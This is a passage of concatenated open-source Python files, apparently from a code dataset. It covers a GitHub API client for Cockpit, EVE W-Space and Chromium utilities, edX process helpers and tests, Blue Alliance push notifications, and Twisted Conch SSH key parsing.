sys.stderr.write("{0}\n{1}\n".format(resource, response['data']))
raise RuntimeError("GitHub API problem: {0}".format(response['reason'] or response['status']))
else:
self.cache.write(qualified, response)
return json.loads(response['data'] or "null")
def post(self, resource, data, accept=[]):
response = self.request("POST", resource, json.dumps(data), { "Content-Type": "application/json" })
status = response['status']
if (status < 200 or status >= 300) and status not in accept:
sys.stderr.write("{0}\n{1}\n".format(resource, response['data']))
raise RuntimeError("GitHub API problem: {0}".format(response['reason'] or status))
self.cache.mark()
return json.loads(response['data'])
def patch(self, resource, data, accept=[]):
response = self.request("PATCH", resource, json.dumps(data), { "Content-Type": "application/json" })
status = response['status']
if (status < 200 or status >= 300) and status not in accept:
sys.stderr.write("{0}\n{1}\n".format(resource, response['data']))
raise RuntimeError("GitHub API problem: {0}".format(response['reason'] or status))
self.cache.mark()
return json.loads(response['data'])
def statuses(self, revision):
result = { }
page = 1
count = 100
while count == 100:
data = self.get("commits/{0}/status?page={1}&per_page={2}".format(revision, page, count))
count = 0
page += 1
if "statuses" in data:
for status in data["statuses"]:
if known_context(status["context"]) and status["context"] not in result:
result[status["context"]] = status
count = len(data["statuses"])
return result
def pulls(self, state='open', since=None):
result = [ ]
page = 1
count = 100
while count == 100:
pulls = self.get("pulls?page={0}&per_page={1}&state={2}&sort=created&direction=desc".format(page, count, state))
count = 0
page += 1
for pull in pulls or []:
# Check that the pulls are past the expected date
if since:
closed = pull.get("closed_at", None)
if closed and since > time.mktime(time.strptime(closed, "%Y-%m-%dT%H:%M:%SZ")):
continue
created = pull.get("created_at", None)
if not closed and created and since > time.mktime(time.strptime(created, "%Y-%m-%dT%H:%M:%SZ")):
continue
result.append(pull)
count += 1
return result
# The since argument is seconds since the issue was either
# created (for open issues) or closed (for closed issues)
def issues(self, labels=[ "bot" ], state="open", since=None):
result = [ ]
page = 1
count = 100
opened = True
label = ",".join(labels)
while count == 100 and opened:
req = "issues?labels={0}&state=all&page={1}&per_page={2}".format(label, page, count)
issues = self.get(req)
count = 0
page += 1
opened = False
for issue in issues:
count += 1
# On each loop of 100 issues we must encounter at least 1 open issue
if issue["state"] == "open":
opened = True
# Make sure the state matches
if state != "all" and issue["state"] != state:
continue
# Check that the issues are past the expected date
if since:
closed = issue.get("closed_at", None)
if closed and since > time.mktime(time.strptime(closed, "%Y-%m-%dT%H:%M:%SZ")):
continue
created = issue.get("created_at", None)
if not closed and created and since > time.mktime(time.strptime(created, "%Y-%m-%dT%H:%M:%SZ")):
continue
result.append(issue)
return result
def commits(self, branch='master', since=None):
page = 1
count = 100
if since:
since = "&since={0}".format(time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(since)))
else:
since = ""
while count == 100:
commits = self.get("commits?page={0}&per_page={1}&sha={2}{3}".format(page, count, branch, since))
count = 0
page += 1
for commit in commits or []:
yield commit
count += 1
def whitelist(self):
users = set()
teamId = self.teamIdFromName(TEAM_CONTRIBUTORS)
page = 1
count = 100
while count == 100:
data = self.get("/teams/{0}/members?page={1}&per_page={2}".format(teamId, page, count)) or []
users.update(user.get("login") for user in data)
count = len(data)
page += 1
return users
def teamIdFromName(self, name):
for team in self.get("/orgs/cockpit-project/teams") or []:
if team.get("name") == name:
return team["id"]
else:
raise KeyError("Team {0} not found".format(name))
class Checklist(object):
def __init__(self, body=None):
self.process(body or "")
@staticmethod
def format_line(item, check):
status = ""
if isinstance(check, str):
status = check + ": "
check = False
return " * [{0}] {1}{2}".format(check and "x" or " ", status, item)
@staticmethod
def parse_line(line):
check = item = None
stripped = line.strip()
if stripped[:6] in ["* [ ] ", "- [ ] ", "* [x] ", "- [x] ", "* [X] ", "- [X] "]:
status, unused, item = stripped[6:].strip().partition(": ")
if not item:
item = status
status = None
if status:
check = status
else:
check = stripped[3] in ["x", "X"]
return (item, check)
def process(self, body, items={ }):
self.items = { }
lines = [ ]
items = items.copy()
for line in body.splitlines():
(item, check) = self.parse_line(line)
if item:
if item in items:
check = items[item]
del items[item]
line = self.format_line(item, check)
self.items[item] = check
lines.append(line)
for item, check in items.items():
lines.append(self.format_line(item, check))
self.items[item] = check
self.body = "\n".join(lines)
def check(self, item, checked=True):
self.process(self.body, { item: checked })
def add(self, item):
self.process(self.body, { item: False })
| lgpl-2.1 |
viarr/eve-wspace | evewspace/POS/utils.py | 6 | 1765 | # Eve W-Space
# Copyright (C) 2013 Andrew Austin and other contributors
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version. An additional term under section
# 7 of the GPL is included in the LICENSE file.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from models import CorpPOS
import eveapi
from API import cache_handler as handler
def add_status_info(poses):
"""Accepts a list of corp poses and returns a list of POSes with
status information attached.
A posstatus object has the following attributes:
itemid: the POS item id
pos: POS object processed
status: Status retrieved
"""
class statusentry:
def __init__(self, pos, status):
self.itemid = pos.apiitemid
self.pos = pos
self.status = status
api = eveapi.EVEAPIConnection(cacheHandler=handler)
#Now that we have a corp authenticated API, let's play with some POSes
statuslist = []
for pos in poses:
auth = api.auth(keyID=pos.apikey.keyid, vCode=pos.apikey.vcode)
result = auth.corp.StarbaseDetail(itemID=pos.apiitemid)
status = statusentry(pos, result)
statuslist.append(status)
return statuslist
| gpl-3.0 |
GeyerA/android_external_chromium_org | tools/git/git-diff-ide.py | 197 | 2668 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Invokes git diff [args...] and inserts file:line in front of each line of diff
output where possible.
This is useful from an IDE that allows you to double-click lines that begin
with file:line to open and jump to that point in the file.
Synopsis:
%prog [git diff args...]
Examples:
%prog
%prog HEAD
"""
import subprocess
import sys
def GitShell(args, ignore_return=False):
"""A shell invocation suitable for communicating with git. Returns
output as list of lines, raises exception on error.
"""
job = subprocess.Popen(args,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
(out, err) = job.communicate()
if job.returncode != 0 and not ignore_return:
print out
raise Exception("Error %d running command %s" % (
job.returncode, args))
return out.split('\n')
def PrintGitDiff(extra_args):
"""Outputs git diff extra_args with file:line inserted into relevant lines."""
current_file = '';
line_num = 0;
lines = GitShell('git diff %s' % ' '.join(extra_args))
for line in lines:
# Pass-through lines:
# diff --git a/file.c b/file.c
# index 0e38c2d..8cd69ae 100644
# --- a/file.c
if (line.startswith('diff ') or
line.startswith('index ') or
line.startswith('--- ')):
print line
continue
# Get the filename from the +++ line:
# +++ b/file.c
if line.startswith('+++ '):
# Filename might be /dev/null or a/file or b/file.
# Skip the first two characters unless it starts with /.
current_file = line[4:] if line[4] == '/' else line[6:]
print line
continue
# Update line number from the @@ lines:
# @@ -41,9 +41,9 @@ def MyFunc():
# ^^
if line.startswith('@@ '):
_, old_nr, new_nr, _ = line.split(' ', 3)
line_num = int(new_nr.split(',')[0])
print line
continue
print current_file + ':' + repr(line_num) + ':' + line
# Increment line number for lines that start with ' ' or '+':
# @@ -41,4 +41,4 @@ def MyFunc():
# file.c:41: // existing code
# file.c:42: // existing code
# file.c:43:-// deleted code
# file.c:43:-// deleted code
# file.c:43:+// inserted code
# file.c:44:+// inserted code
if line.startswith(' ') or line.startswith('+'):
line_num += 1
def main():
PrintGitDiff(sys.argv[1:])
if __name__ == '__main__':
main()
| bsd-3-clause |
eduNEXT/edx-platform | pavelib/utils/process.py | 3 | 3512 | """
Helper functions for managing processes.
"""
import atexit
import os
import signal
import subprocess
import sys
import psutil
from paver import tasks
def kill_process(proc):
"""
Kill the process `proc` created with `subprocess`.
"""
p1_group = psutil.Process(proc.pid)
child_pids = p1_group.children(recursive=True)
for child_pid in child_pids:
os.kill(child_pid.pid, signal.SIGKILL)
def run_multi_processes(cmd_list, out_log=None, err_log=None):
"""
Run each shell command in `cmd_list` in a separate process,
piping stdout to `out_log` (a path) and stderr to `err_log` (also a path).
Terminates the processes on CTRL-C and ensures the processes are killed
if an error occurs.
"""
kwargs = {'shell': True, 'cwd': None}
pids = []
if out_log:
out_log_file = open(out_log, 'w') # lint-amnesty, pylint: disable=consider-using-with
kwargs['stdout'] = out_log_file
if err_log:
err_log_file = open(err_log, 'w') # lint-amnesty, pylint: disable=consider-using-with
kwargs['stderr'] = err_log_file
# If the user is performing a dry run of a task, then just log
# the command strings and return so that no destructive operations
# are performed.
if tasks.environment.dry_run:
for cmd in cmd_list:
tasks.environment.info(cmd)
return
try:
for cmd in cmd_list:
pids.extend([subprocess.Popen(cmd, **kwargs)])
# pylint: disable=unused-argument
def _signal_handler(*args):
"""
What to do when process is ended
"""
print("\nEnding...")
signal.signal(signal.SIGINT, _signal_handler)
print("Enter CTL-C to end")
signal.pause()
print("Processes ending")
# pylint: disable=broad-except
except Exception as err:
print(f"Error running process {err}", file=sys.stderr)
finally:
for pid in pids:
kill_process(pid)
def run_process(cmd, out_log=None, err_log=None):
"""
Run the shell command `cmd` in a separate process,
piping stdout to `out_log` (a path) and stderr to `err_log` (also a path).
Terminates the process on CTRL-C or if an error occurs.
"""
return run_multi_processes([cmd], out_log=out_log, err_log=err_log)
def run_background_process(cmd, out_log=None, err_log=None, cwd=None):
"""
Runs a command as a background process. Sends SIGINT at exit.
"""
kwargs = {'shell': True, 'cwd': cwd}
if out_log:
out_log_file = open(out_log, 'w') # lint-amnesty, pylint: disable=consider-using-with
kwargs['stdout'] = out_log_file
if err_log:
err_log_file = open(err_log, 'w') # lint-amnesty, pylint: disable=consider-using-with
kwargs['stderr'] = err_log_file
proc = subprocess.Popen(cmd, **kwargs) # lint-amnesty, pylint: disable=consider-using-with
def exit_handler():
"""
Send SIGINT to the process's children. This is important
for running commands under coverage, as coverage will not
produce the correct artifacts if the child process isn't
killed properly.
"""
p1_group = psutil.Process(proc.pid)
child_pids = p1_group.children(recursive=True)
for child_pid in child_pids:
os.kill(child_pid.pid, signal.SIGINT)
# Wait for process to actually finish
proc.wait()
atexit.register(exit_handler)
| agpl-3.0 |
verycumbersome/the-blue-alliance | notifications/base_notification.py | 3 | 7224 | import logging
import random
import tba_config
import urllib
import uuid
from google.appengine.ext import deferred
from google.appengine.api import memcache
from google.appengine.api import urlfetch
from controllers.gcm.gcm import GCMMessage
from consts.client_type import ClientType
from consts.notification_type import NotificationType
from helpers.notification_sender import NotificationSender
from models.sitevar import Sitevar
class BaseNotification(object):
# List of clients this notification type supports (these are default values)
# Can be overridden by subclasses to only send to some types
_supported_clients = [ClientType.OS_ANDROID, ClientType.WEBHOOK, ClientType.WEB]
# If not None, the event feed to post this notification to
# Typically the event key
_event_feed = None
# If not None, the district feed to post this notificatoin to
# Typically, district abbreviation from consts/district_type
_district_feed = None
# Send analytics updates for this notification?
# Can be overridden by subclasses if not
_track_call = True
# GCM Priority for this message, set to "High" for important pushes
# Valid types are 'high' and 'normal'
# https://developers.google.com/cloud-messaging/concept-options#setting-the-priority-of-a-message
_priority = 'normal'
# If set to (key, timeout_seconds), won't send multiple notifications
_timeout = None
"""
Class that acts as a basic notification.
To send a notification, instantiate one and call this method
"""
def send(self, keys, push_firebase=True, track_call=True):
if self._timeout is not None:
key, timeout = self._timeout
if memcache.get(key): # Using memcache is a hacky implementation, since it is not guaranteed.
logging.info("Notification timeout for: {}".format(key))
return # Currently in timeout. Don't send.
else:
memcache.set(key, True, timeout)
self.keys = keys # dict like {ClientType : [ key ] } ... The list for webhooks is a tuple of (key, secret)
deferred.defer(self.render, self._supported_clients, _queue="push-notifications")
if self._track_call and track_call:
num_keys = 0
for v in keys.values():
# Count the number of clients receiving the notification
num_keys += len(v)
if random.random() < tba_config.GA_RECORD_FRACTION:
deferred.defer(self.track_notification, self._type, num_keys, _queue="api-track-call")
"""
This method will create platform specific notifications and send them to the platform specified
Clients should implement the referenced methods in order to build the notification for each platform
"""
def render(self, client_types):
if not isinstance(client_types, list):
# Listify client types, if needed
client_types = [client_types]
if not self.check_enabled():
# Don't send for NotificationTypes that aren't enabled
return
for client_type in client_types:
if client_type == ClientType.OS_ANDROID and ClientType.OS_ANDROID in self.keys:
notification = self._render_android()
if len(self.keys[ClientType.OS_ANDROID]) > 0: # this is after _render because if it's an update fav/subscription notification, then
NotificationSender.send_gcm(notification) # we remove the client id that sent the update so it doesn't get notified redundantly
elif client_type == ClientType.OS_IOS and ClientType.OS_IOS in self.keys:
notification = self._render_ios()
NotificationSender.send_ios(notification)
if client_type == ClientType.WEB and ClientType.WEB in self.keys:
notification = self._render_web()
if len(self.keys[ClientType.WEB]) > 0: # this is after _render because if it's an update fav/subscription notification, then
NotificationSender.send_gcm(notification) # we remove the client id that sent the update so it doesn't get notified redundantly
elif client_type == ClientType.WEBHOOK and ClientType.WEBHOOK in self.keys and len(self.keys[ClientType.WEBHOOK]) > 0:
notification = self._render_webhook()
NotificationSender.send_webhook(notification, self.keys[ClientType.WEBHOOK])
def check_enabled(self):
var = Sitevar.get_by_id('notifications.enable')
return var is None or var.values_json == "true"
"""
Subclasses should override this method and return a dict containing the payload of the notification.
The dict should have two entries: 'message_type' (should be one of NotificationType, string) and 'message_data'
"""
def _build_dict(self):
raise NotImplementedError("Subclasses must implement this method to build JSON data to send")
@property
def _type(self):
raise NotImplementedError("Subclasses must implement this message to set its notification type")
"""
The following methods are default render methods. Often, the way we construct the messages doesn't change, so we abstract it to here.
However, if a notification type needs to do something special (e.g. specify a GCM collapse key), then subclasses can override them
in order to provide that functionality.
"""
def _render_android(self):
gcm_keys = self.keys[ClientType.OS_ANDROID]
data = self._build_dict()
return GCMMessage(gcm_keys, data, priority=self._priority)
def _render_ios(self):
pass
def _render_web(self):
gcm_keys = self.keys[ClientType.WEB]
data = self._build_dict()
return GCMMessage(gcm_keys, data, priority=self._priority)
def _render_webhook(self):
return self._build_dict()
# used for deferred analytics call
def track_notification(self, notification_type_enum, num_keys):
"""
For more information about GAnalytics Protocol Parameters, visit
https://developers.google.com/analytics/devguides/collection/protocol/v1/parameters
"""
analytics_id = Sitevar.get_by_id("google_analytics.id")
if analytics_id is None:
logging.warning("Missing sitevar: google_analytics.id. Can't track API usage.")
else:
GOOGLE_ANALYTICS_ID = analytics_id.contents['GOOGLE_ANALYTICS_ID']
params = urllib.urlencode({
'v': 1,
'tid': GOOGLE_ANALYTICS_ID,
'cid': uuid.uuid3(uuid.NAMESPACE_X500, str('tba-notification-tracking')),
't': 'event',
'ec': 'notification',
'ea': NotificationType.type_names[notification_type_enum],
'ev': num_keys,
'ni': 1,
'sc': 'end', # forces tracking session to end
})
analytics_url = 'http://www.google-analytics.com/collect?%s' % params
urlfetch.fetch(
url=analytics_url,
method=urlfetch.GET,
deadline=10,
)
| mit |
arbrandes/edx-platform | openedx/core/djangoapps/catalog/management/commands/tests/test_sync_course_runs.py | 4 | 4270 | """
Tests for the sync course runs management command.
"""
from unittest import mock
import ddt
from django.core.management import call_command
from openedx.core.djangoapps.catalog.tests.factories import CourseRunFactory
from openedx.core.djangoapps.catalog.management.commands.sync_course_runs import Command as sync_command
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory
COMMAND_MODULE = 'openedx.core.djangoapps.catalog.management.commands.sync_course_runs'
@ddt.ddt
@mock.patch(COMMAND_MODULE + '.get_course_runs')
class TestSyncCourseRunsCommand(ModuleStoreTestCase):
"""
Test for the sync course runs management command.
"""
def setUp(self):
super().setUp()
# create mongo course
self.course = CourseFactory.create()
# load this course into course overview
self.course_overview = CourseOverview.get_from_id(self.course.id)
# create a catalog course run with the same course id.
self.catalog_course_run = CourseRunFactory(
key=str(self.course.id),
marketing_url='test_marketing_url',
eligible_for_financial_aid=False
)
def test_course_run_sync(self, mock_catalog_course_runs):
"""
Verify on executing management command course overview data is updated
with course run data from course discovery.
"""
mock_catalog_course_runs.return_value = [self.catalog_course_run]
call_command('sync_course_runs')
updated_course_overview = CourseOverview.objects.get(id=self.course.id)
# assert fields have updated
for field in sync_command.course_run_fields:
course_overview_field_name = field.course_overview_name
catalog_field_name = field.catalog_name
previous_course_overview_value = getattr(self.course_overview, course_overview_field_name)
updated_course_overview_value = getattr(updated_course_overview, course_overview_field_name)
# course overview value matches catalog value
assert updated_course_overview_value == self.catalog_course_run.get(catalog_field_name) # pylint: disable=no-member, line-too-long
# new value doesn't match old value
assert updated_course_overview_value != previous_course_overview_value
@mock.patch(COMMAND_MODULE + '.log.info')
def test_course_overview_does_not_exist(self, mock_log_info, mock_catalog_course_runs):
"""
Verify no error in case if a course run is not found in course overview.
"""
nonexistent_course_run = CourseRunFactory()
mock_catalog_course_runs.return_value = [self.catalog_course_run, nonexistent_course_run]
call_command('sync_course_runs')
mock_log_info.assert_any_call(
'[sync_course_runs] course overview record not found for course run: %s',
nonexistent_course_run['key'],
)
updated_marketing_url = CourseOverview.objects.get(id=self.course.id).marketing_url
assert updated_marketing_url == 'test_marketing_url'
@mock.patch(COMMAND_MODULE + '.log.info')
def test_starting_and_ending_logs(self, mock_log_info, mock_catalog_course_runs):
"""
Verify logging at start and end of the command.
"""
def _assert_logs(num_updates):
mock_log_info.assert_any_call('[sync_course_runs] Fetching course runs from catalog service.')
mock_log_info.assert_any_call(
'[sync_course_runs] course runs found in catalog: %d, course runs found in course overview: %d,'
' course runs not found in course overview: %d, course overviews updated: %d',
3,
1,
2,
num_updates,
)
mock_log_info.reset_mock()
mock_catalog_course_runs.return_value = [self.catalog_course_run, CourseRunFactory(), CourseRunFactory()]
call_command('sync_course_runs')
_assert_logs(num_updates=1)
call_command('sync_course_runs')
_assert_logs(num_updates=0)
| agpl-3.0 |
kenorb-contrib/BitTorrent | twisted/conch/ssh/keys.py | 2 | 16522 | # Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
#
"""Handling of RSA and DSA keys.
This module is unstable.
Maintainer: U{Paul Swartz<mailto:z3p@twistedmatrix.com>}
"""
# base library imports
import base64
import string
import sha, md5
# external library imports
from Crypto.Cipher import DES3
from Crypto.PublicKey import RSA, DSA
from Crypto import Util
#twisted
from twisted.python import log
# sibling imports
import asn1, common, sexpy
class BadKeyError(Exception):
"""
raised when a key isn't what we expected from it.
XXX: we really need to check for bad keys
"""
def getPublicKeyString(filename = None, line = 0, data = ''):
"""
Return a public key string given a filename or data of a public key.
Currently handles OpenSSH and LSH keys.
@type filename: C{str}
@type line: C{int}
@type data: C{str}
@rtype: C{str}
"""
if filename:
lines = open(filename).readlines()
data = lines[line]
if data[0] == '{': # lsh key
return getPublicKeyString_lsh(data)
elif data.startswith('ssh-'): # openssh key
return getPublicKeyString_openssh(data)
else:
raise BadKeyError('unknown type of key')
def getPublicKeyString_lsh(data):
sexp = sexpy.parse(base64.decodestring(data[1:-1]))
assert sexp[0] == 'public-key'
kd = {}
for name, data in sexp[1][1:]:
kd[name] = common.NS(data)
if sexp[1][0] == 'dsa':
assert len(kd) == 4, len(kd)
return '\x00\x00\x00\x07ssh-dss' + kd['p'] + kd['q'] + kd['g'] + kd['y']
elif sexp[1][0] == 'rsa-pkcs1-sha1':
assert len(kd) == 2, len(kd)
return '\x00\x00\x00\x07ssh-rsa' + kd['e'] + kd['n']
else:
raise BadKeyError('unknown lsh key type %s' % sexp[1][0])
def getPublicKeyString_openssh(data):
fileKind, fileData = data.split()[:2]
# if fileKind != kind:
# raise BadKeyError, 'key should be %s but instead is %s' % (kind, fileKind)
return base64.decodestring(fileData)
def makePublicKeyString(obj, comment = '', kind = 'openssh'):
"""
Return an public key given a C{Crypto.PublicKey.pubkey.pubkey}
object.
kind is one of ('openssh', 'lsh')
@type obj: C{Crypto.PublicKey.pubkey.pubkey}
@type comment: C{str}
@type kind: C{str}
@rtype: C{str}
"""
if kind == 'lsh':
return makePublicKeyString_lsh(obj) # no comment
elif kind == 'openssh':
return makePublicKeyString_openssh(obj, comment)
else:
raise BadKeyError('bad kind %s' % kind)
def makePublicKeyString_lsh(obj):
keyType = objectType(obj)
if keyType == 'ssh-rsa':
keyData = sexpy.pack([['public-key', ['rsa-pkcs1-sha1',
['n', common.MP(obj.n)[4:]],
['e', common.MP(obj.e)[4:]]]]])
elif keyType == 'ssh-dss':
keyData = sexpy.pack([['public-key', ['dsa',
['p', common.MP(obj.p)[4:]],
['q', common.MP(obj.q)[4:]],
['g', common.MP(obj.g)[4:]],
['y', common.MP(obj.y)[4:]]]]])
else:
raise BadKeyError('bad keyType %s' % keyType)
return '{' + base64.encodestring(keyData).replace('\n','') + '}'
def makePublicKeyString_openssh(obj, comment):
keyType = objectType(obj)
if keyType == 'ssh-rsa':
keyData = common.MP(obj.e) + common.MP(obj.n)
elif keyType == 'ssh-dss':
keyData = common.MP(obj.p)
keyData += common.MP(obj.q)
keyData += common.MP(obj.g)
keyData += common.MP(obj.y)
else:
raise BadKeyError('unknown key type %s' % keyType)
b64Data = base64.encodestring(common.NS(keyType)+keyData).replace('\n', '')
return '%s %s %s' % (keyType, b64Data, comment)
def getPublicKeyObject(data):
"""
Return a C{Crypto.PublicKey.pubkey.pubkey} corresponding to the SSHv2
public key data. data is in the over-the-wire public key format.
@type data: C{str}
@rtype: C{Crypto.PublicKey.pubkey.pubkey}
"""
keyKind, rest = common.getNS(data)
if keyKind == 'ssh-rsa':
e, rest = common.getMP(rest)
n, rest = common.getMP(rest)
return RSA.construct((n, e))
elif keyKind == 'ssh-dss':
p, rest = common.getMP(rest)
q, rest = common.getMP(rest)
g, rest = common.getMP(rest)
y, rest = common.getMP(rest)
return DSA.construct((y, g, p, q))
else:
raise BadKeyError('unknown key type %s' % keyKind)
def getPrivateKeyObject(filename = None, data = '', passphrase = ''):
"""
Return a C{Crypto.PublicKey.pubkey.pubkey} object corresponding to the
private key file/data. If the private key is encrypted, passphrase B{must}
be specified, other wise a C{BadKeyError} will be raised.
@type filename: C{str}
@type data: C{str}
@type passphrase: C{str}
@raises BadKeyError: if the key is invalid or a passphrase is not specified
"""
if filename:
data = open(filename).readlines()
else:
data = [x+'\n' for x in data.split('\n')]
if data[0][0] == '(': # lsh key
return getPrivateKeyObject_lsh(data, passphrase)
elif data[0].startswith('-----'): # openssh key
return getPrivateKeyObject_openssh(data, passphrase)
elif data[0].startswith('ssh-'): # agent v3 private key
return getPrivateKeyObject_agentv3(data, passphrase)
else:
raise BadKeyError('unknown private key type')
def getPrivateKeyObject_lsh(data, passphrase):
#assert passphrase == ''
data = ''.join(data)
sexp = sexpy.parse(data)
assert sexp[0] == 'private-key'
kd = {}
for name, data in sexp[1][1:]:
kd[name] = common.getMP(common.NS(data))[0]
if sexp[1][0] == 'dsa':
assert len(kd) == 5, len(kd)
return DSA.construct((kd['y'], kd['g'], kd['p'], kd['q'], kd['x']))
elif sexp[1][0] == 'rsa-pkcs1':
assert len(kd) == 8, len(kd)
return RSA.construct((kd['n'], kd['e'], kd['d'], kd['p'], kd['q']))
else:
raise BadKeyError('unknown lsh key type %s' % sexp[1][0])
def getPrivateKeyObject_openssh(data, passphrase):
kind = data[0][11: 14]
if data[1].startswith('Proc-Type: 4,ENCRYPTED'): # encrypted key
ivdata = data[2].split(',')[1][:-1]
iv = ''.join([chr(int(ivdata[i:i+2],16)) for i in range(0, len(ivdata), 2)])
if not passphrase:
raise BadKeyError, 'encrypted key with no passphrase'
ba = md5.new(passphrase + iv).digest()
bb = md5.new(ba + passphrase + iv).digest()
decKey = (ba + bb)[:24]
b64Data = base64.decodestring(''.join(data[4:-1]))
keyData = DES3.new(decKey, DES3.MODE_CBC, iv).decrypt(b64Data)
removeLen = ord(keyData[-1])
keyData = keyData[:-removeLen]
else:
keyData = base64.decodestring(''.join(data[1:-1]))
try:
decodedKey = asn1.parse(keyData)
except Exception, e:
raise BadKeyError, 'something wrong with decode'
if type(decodedKey[0]) == type([]):
decodedKey = decodedKey[0] # this happens with encrypted keys
if kind == 'RSA':
n,e,d,p,q=decodedKey[1:6]
return RSA.construct((n,e,d,p,q))
elif kind == 'DSA':
p, q, g, y, x = decodedKey[1: 6]
return DSA.construct((y, g, p, q, x))
def getPrivateKeyObject_agentv3(data, passphrase):
if passphrase:
raise BadKeyError("agent v3 key should not be encrypted")
keyType, data = common.getNS(data)
if keyType == 'ssh-dss':
p, data = common.getMP(data)
q, data = common.getMP(data)
g, data = common.getMP(data)
y, data = common.getMP(data)
x, data = common.getMP(data)
return DSA.construct((y,g,p,q,x))
elif keyType == 'ssh-rsa':
e, data = common.getMP(data)
d, data = common.getMP(data)
n, data = common.getMP(data)
u, data = common.getMP(data)
p, data = common.getMP(data)
q, data = common.getMP(data)
return RSA.construct((n,e,d,p,q,u))
else:
raise BadKeyError("unknown key type %s" % keyType)
def makePrivateKeyString(obj, passphrase = None, kind = 'openssh'):
"""
Return an OpenSSH-style private key for a
C{Crypto.PublicKey.pubkey.pubkey} object. If passphrase is given, encrypt
the private key with it.
kind is one of ('openssh', 'lsh', 'agentv3')
@type obj: C{Crypto.PublicKey.pubkey.pubkey}
@type passphrase: C{str}/C{None}
@type kind: C{str}
@rtype: C{str}
"""
if kind == 'lsh':
return makePrivateKeyString_lsh(obj, passphrase)
elif kind == 'openssh':
return makePrivateKeyString_openssh(obj, passphrase)
elif kind == 'agentv3':
return makePrivateKeyString_agentv3(obj, passphrase)
else:
raise BadKeyError('bad kind %s' % kind)
def makePrivateKeyString_lsh(obj, passphrase):
if passphrase:
raise BadKeyError("cannot encrypt to lsh format")
keyType = objectType(obj)
if keyType == 'ssh-rsa':
p,q=obj.p,obj.q
if p > q:
(p,q)=(q,p)
return sexpy.pack([['private-key', ['rsa-pkcs1',
['n', common.MP(obj.n)[4:]],
['e', common.MP(obj.e)[4:]],
['d', common.MP(obj.d)[4:]],
['p', common.MP(q)[4:]],
['q', common.MP(p)[4:]],
['a', common.MP(obj.d%(q-1))[4:]],
['b', common.MP(obj.d%(p-1))[4:]],
['c', common.MP(Util.number.inverse(p, q))[4:]]]]])
elif keyType == 'ssh-dss':
return sexpy.pack([['private-key', ['dsa',
['p', common.MP(obj.p)[4:]],
['q', common.MP(obj.q)[4:]],
['g', common.MP(obj.g)[4:]],
['y', common.MP(obj.y)[4:]],
['x', common.MP(obj.x)[4:]]]]])
else:
raise BadKeyError('bad keyType %s' % keyType)
def makePrivateKeyString_openssh(obj, passphrase):
keyType = objectType(obj)
if keyType == 'ssh-rsa':
keyData = '-----BEGIN RSA PRIVATE KEY-----\n'
p,q=obj.p,obj.q
if p > q:
(p,q) = (q,p)
# p is less than q
objData = [0, obj.n, obj.e, obj.d, q, p, obj.d%(q-1), obj.d%(p-1),Util.number.inverse(p, q)]
elif keyType == 'ssh-dss':
keyData = '-----BEGIN DSA PRIVATE KEY-----\n'
objData = [0, obj.p, obj.q, obj.g, obj.y, obj.x]
else:
raise BadKeyError('unknown key type %s' % keyType)
if passphrase:
iv = common.entropy.get_bytes(8)
hexiv = ''.join(['%02X' % ord(x) for x in iv])
keyData += 'Proc-Type: 4,ENCRYPTED\n'
keyData += 'DEK-Info: DES-EDE3-CBC,%s\n\n' % hexiv
ba = md5.new(passphrase + iv).digest()
bb = md5.new(ba + passphrase + iv).digest()
encKey = (ba + bb)[:24]
asn1Data = asn1.pack([objData])
if passphrase:
padLen = 8 - (len(asn1Data) % 8)
asn1Data += (chr(padLen) * padLen)
asn1Data = DES3.new(encKey, DES3.MODE_CBC, iv).encrypt(asn1Data)
b64Data = base64.encodestring(asn1Data).replace('\n','')
b64Data = '\n'.join([b64Data[i:i+64] for i in range(0,len(b64Data),64)])
keyData += b64Data + '\n'
if keyType == 'ssh-rsa':
keyData += '-----END RSA PRIVATE KEY-----'
elif keyType == 'ssh-dss':
keyData += '-----END DSA PRIVATE KEY-----'
return keyData
def makePrivateKeyString_agentv3(obj, passphrase):
if passphrase:
raise BadKeyError("cannot encrypt to agent v3 format")
keyType = objectType(obj)
if keyType == 'ssh-rsa':
values = (obj.e, obj.d, obj.n, obj.u, obj.p, obj.q)
elif keyType == 'ssh-dss':
values = (obj.p, obj.q, obj.g, obj.y, obj.x)
return common.NS(keytype) + ''.join(map(common.MP, values))
def makePublicKeyBlob(obj):
keyType = objectType(obj)
if keyType == 'ssh-rsa':
keyData = common.MP(obj.e) + common.MP(obj.n)
elif keyType == 'ssh-dss':
keyData = common.MP(obj.p)
keyData += common.MP(obj.q)
keyData += common.MP(obj.g)
keyData += common.MP(obj.y)
return common.NS(keyType)+keyData
def makePrivateKeyBlob(obj):
keyType = objectType(obj)
if keyType == 'ssh-rsa':
return common.NS(keyType) + common.MP(obj.n) + common.MP(obj.e) + \
common.MP(obj.d) + common.MP(obj.u) + common.MP(obj.q) + \
common.MP(obj.p)
elif keyType == 'ssh-dss':
return common.NS(keyType) + common.MP(obj.p) + common.MP(obj.q) + \
common.MP(obj.g) + common.MP(obj.y) + common.MP(obj.x)
else:
raise ValueError('trying to get blob for invalid key type: %s' % keyType)
def objectType(obj):
"""
Return the SSH key type corresponding to a C{Crypto.PublicKey.pubkey.pubkey}
object.
@type obj: C{Crypto.PublicKey.pubkey.pubkey}
@rtype: C{str}
"""
keyDataMapping = {
('n', 'e', 'd', 'p', 'q'): 'ssh-rsa',
('n', 'e', 'd', 'p', 'q', 'u'): 'ssh-rsa',
('y', 'g', 'p', 'q', 'x'): 'ssh-dss'
}
return keyDataMapping[tuple(obj.keydata)]
def pkcs1Pad(data, lMod):
lenPad = lMod-2-len(data)
return '\x01'+('\xff'*lenPad)+'\x00'+data
def pkcs1Digest(data, lMod):
